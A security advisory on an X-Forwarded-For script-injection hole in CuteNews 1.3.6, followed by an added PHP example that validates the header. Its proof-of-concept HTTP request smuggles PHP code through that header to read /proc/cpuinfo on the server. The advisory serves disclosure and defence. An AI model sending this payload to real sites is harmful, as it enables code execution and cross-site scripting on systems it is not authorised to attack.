CutePHP CuteNews X-Forwarded-For Script Injection Vulnerability
BID:12691
Info
| Bugtraq ID: | 12691 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2005 12:00AM |
| Updated: | Mar 01 2005 12:00AM |
| Credit: | FraMe <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: | CutePHP CuteNews 1.3.6 |
| Not Vulnerable: | |
Discussion
A remote script injection vulnerability affects CutePHP CuteNews. The application fails to properly sanitize user-supplied input, here the X-Forwarded-For request header, before using it to carry out critical functionality.
An attacker may leverage this issue to inject arbitrary server-side scripts locally and client-side scripts remotely, potentially facilitating code execution with the privileges of the affected Web server and cross-site scripting attacks.
Exploit / POC
No exploit is required to leverage this issue. The following proof of concept has been provided to facilitate server-side script execution and must be invoked locally:
POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
X-FORWARDED-FOR: <?include("/proc/cpuinfo");?>

name=proof+of+concept&mail=&comments=proof+of+concept&submit=Add+My+Comment&subaction=addcomment&ucat=&show=&cutepath=/parla
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
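In the absence of a vendor patch, the following added example (not CuteNews code and not a vendor fix) shows one way a PHP application can treat X-Forwarded-For as untrusted input: the header is honoured only when it arrives from a known proxy and parses as an IP address, and the result is HTML-encoded on output. The function names, the TRUSTED_PROXIES list and the sample addresses are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not part of CuteNews.

// Assumption: addresses of reverse proxies allowed to set X-Forwarded-For.
const TRUSTED_PROXIES = ['127.0.0.1'];

/**
 * Return the client address as a validated IP string.
 * The header is used only when the direct peer is a trusted proxy and the
 * value parses as an IP address; otherwise REMOTE_ADDR is returned.
 */
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // no usable peer address
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '' || !in_array($peer, TRUSTED_PROXIES, true)) {
        return $peer; // header absent, or sent by an untrusted peer
    }
    // The header may carry a comma-separated chain; the right-most entry
    // is the one appended by our own proxy.
    $parts = explode(',', $xff);
    $candidate = trim(end($parts));
    $valid = filter_var($candidate, FILTER_VALIDATE_IP);
    return $valid === false ? $peer : $valid;
}

/** Encode a stored field before writing it into an HTML page. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Constructed input carrying the header value from the proof of concept.
$request = [
    'REMOTE_ADDR'          => '127.0.0.1',
    'HTTP_X_FORWARDED_FOR' => '<?include("/proc/cpuinfo");?>',
];
// Not an IP address, so the header is discarded in favour of REMOTE_ADDR.
echo h(client_ip($request)), "\n";

// Constructed well-formed chain: the right-most address is used.
$request['HTTP_X_FORWARDED_FOR'] = '198.51.100.7, 203.0.113.9';
echo h(client_ip($request)), "\n";
```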
References
References:
- CuteNews Home Page (CutePHP)
- Kernelpanik Labs Digest 2005-2 ("Kernelpanik Labs - Security Lists")